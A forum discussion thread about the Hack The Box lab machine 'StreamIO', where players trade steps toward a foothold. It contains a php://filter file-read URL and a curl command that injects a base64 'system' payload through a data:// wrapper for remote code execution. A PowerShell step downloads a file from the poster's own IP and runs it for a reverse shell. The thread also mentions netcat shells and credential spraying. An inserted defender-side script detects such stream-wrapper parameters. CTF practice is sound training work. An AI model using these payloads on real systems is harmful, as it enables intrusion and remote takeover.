StreamIO - HTB [Discussion]
(June 5, 2022, 10:15 AM)NoobHTB Wrote:
(June 5, 2022, 10:07 AM)qwerty173 Wrote:
(June 5, 2022, 08:52 AM)Exa Wrote: https://streamio.htb/admin/?debug=php://filter/convert.base64-encode/resource=index.php


So I had found these creds already but I'm stuck on where to use them... I've found out that yoshihide is a valid username in the domain but none of the credentials can be sprayed against this user or the other ones from the DB. Not sure where to move next...

Can we use Winrm or PsExec for these creds?


Doesn't look like it no... Tried spraying with cme to no avail... WinRM also isn't open AFAIK
Reply
[code]curl -s -k -X 'POST' -H 'Content-Type: application/x-www-form-urlencoded' -b 'PHPSESSID=' --data-binary "include=data://text/plain;base64,c3lzdGVtKCRfR0VUWydjbWQnXSk7" 'https://streamio.htb/admin/?debug=master.php&cmd=dir' | grep '' -A 9999 |grep '
' -B 9999 | tail -n +3 |head -n -1[/code]
Reply
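Added example, not part of any post in this thread: a defender-side check that flags PHP stream wrappers (the `php://filter` value in `debug` and the `data://` value in `include` quoted above) in request parameters. The log lines, IPs and body are constructed, and scanning the POST body assumes request bodies are captured somewhere (for instance a WAF audit log).

```python
import re
from urllib.parse import unquote

# PHP stream wrappers that should not show up inside a request parameter value.
WRAPPER = re.compile(r"\b(?:(?:php|phar|expect|zip|glob)://|data:[\w.+/-]*[;,])", re.I)
# Request line of a combined-format access log entry.
REQUEST = re.compile(r'"[A-Z]+ (\S+) HTTP/[\d.]+"')

def fully_decode(value, rounds=3):
    """Percent-decode until stable; logged values may be encoded more than once."""
    value = value.replace("+", " ")
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def wrapper_hits(encoded_pairs):
    """Return [(param, scheme)] for each parameter whose value names a wrapper."""
    hits = []
    for pair in encoded_pairs.split("&"):
        name, _, value = pair.partition("=")
        match = WRAPPER.search(fully_decode(value))
        if match:
            hits.append((unquote(name), match.group(0).split(":")[0].lower()))
    return hits

def scan_log_line(line):
    """Check the query string of one access-log line."""
    request = REQUEST.search(line)
    return wrapper_hits(request.group(1).partition("?")[2]) if request else []

# Constructed sample data: documentation IPs and a harmless base64 payload.
SAMPLE_LOG = [
    '192.0.2.10 - - [05/Jun/2022:10:15:00 +0000] "GET /admin/?debug=php://filter/convert.base64-encode/resource=index.php HTTP/1.1" 200 5120',
    '192.0.2.10 - - [05/Jun/2022:10:16:00 +0000] "GET /admin/?debug=php%3A%2F%2Ffilter%2Fresource%3Dindex.php HTTP/1.1" 200 4096',
    '192.0.2.20 - - [05/Jun/2022:10:17:00 +0000] "GET /index.php?page=about HTTP/1.1" 200 2048',
]
SAMPLE_BODY = "include=data://text/plain;base64,aGVsbG8="

if __name__ == "__main__":
    for line in SAMPLE_LOG:
        print(scan_log_line(line), line.split('"')[1])
    print(wrapper_hits(SAMPLE_BODY), "(POST body)")
```

A hit on a parameter that is later passed to `include` or `eval()` is worth alerting on; the durable fix is an allowlist of includable files on the server side.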
(June 5, 2022, 10:07 AM)qwerty173 Wrote:
(June 5, 2022, 08:52 AM)Exa Wrote: https://streamio.htb/admin/?debug=php://filter/convert.base64-encode/resource=index.php


So I had found these creds already but I'm stuck on where to use them... I've found out that yoshihide is a valid username in the domain but none of the credentials can be sprayed against this user or the other ones from the DB. Not sure where to move next...


I found a MSSQL credential in login.php. Worth taking a look at.
Reply
(June 5, 2022, 11:29 AM)karhu Wrote:
(June 5, 2022, 10:07 AM)qwerty173 Wrote:
(June 5, 2022, 08:52 AM)Exa Wrote: https://streamio.htb/admin/?debug=php://filter/convert.base64-encode/resource=index.php


So I had found these creds already but I'm stuck on where to use them... I've found out that yoshihide is a valid username in the domain but none of the credentials can be sprayed against this user or the other ones from the DB. Not sure where to move next...


I found a MSSQL credential in login.php. Worth taking a look at.


Yeah already found that... I'm using the curl command that someone provided above which works great. Some of it isn't required though. I'm now having a hard time turning this RCE into a shell... I feel pretty dumb right now lol
Reply
Can anyone explain how you dumped the user table so fast? My sqlmap will take days to dump those 30 users
Reply
(June 5, 2022, 11:02 AM)jon01 Wrote:
(June 5, 2022, 08:03 AM)dude4695 Wrote: anyone got user shell ?


check the master.php code via php filter u will see eval()


how to get reverse shell ?
Reply
Got shell via exec()... just upload and use nc
Reply
(June 5, 2022, 11:45 AM)qwerty173 Wrote:
(June 5, 2022, 11:29 AM)karhu Wrote:
(June 5, 2022, 10:07 AM)qwerty173 Wrote:
(June 5, 2022, 08:52 AM)Exa Wrote: https://streamio.htb/admin/?debug=php://filter/convert.base64-encode/resource=index.php


So I had found these creds already but I'm stuck on where to use them... I've found out that yoshihide is a valid username in the domain but none of the credentials can be sprayed against this user or the other ones from the DB. Not sure where to move next...


I found a MSSQL credential in login.php. Worth taking a look at.


Yeah already found that... I'm using the curl command that someone provided above which works great. Some of it isn't required though. I'm now having a hard time turning this RCE into a shell... I feel pretty dumb right now lol


Same lol

I tried mshta, which connected to my system, but then the webserver crashed. Finally got the reverse shell by using powershell:

cmd=powershell.exe+iwr+-uri+<IP>/<filename>.php+-outfile+"C:\Downloads\<filename>.php"
Then,
cmd=php.exe+..\..\..\Downloads\<filename>.php
Reply
Searching Martin...
Reply
can anyone give me steps to get rev shell ?
Reply

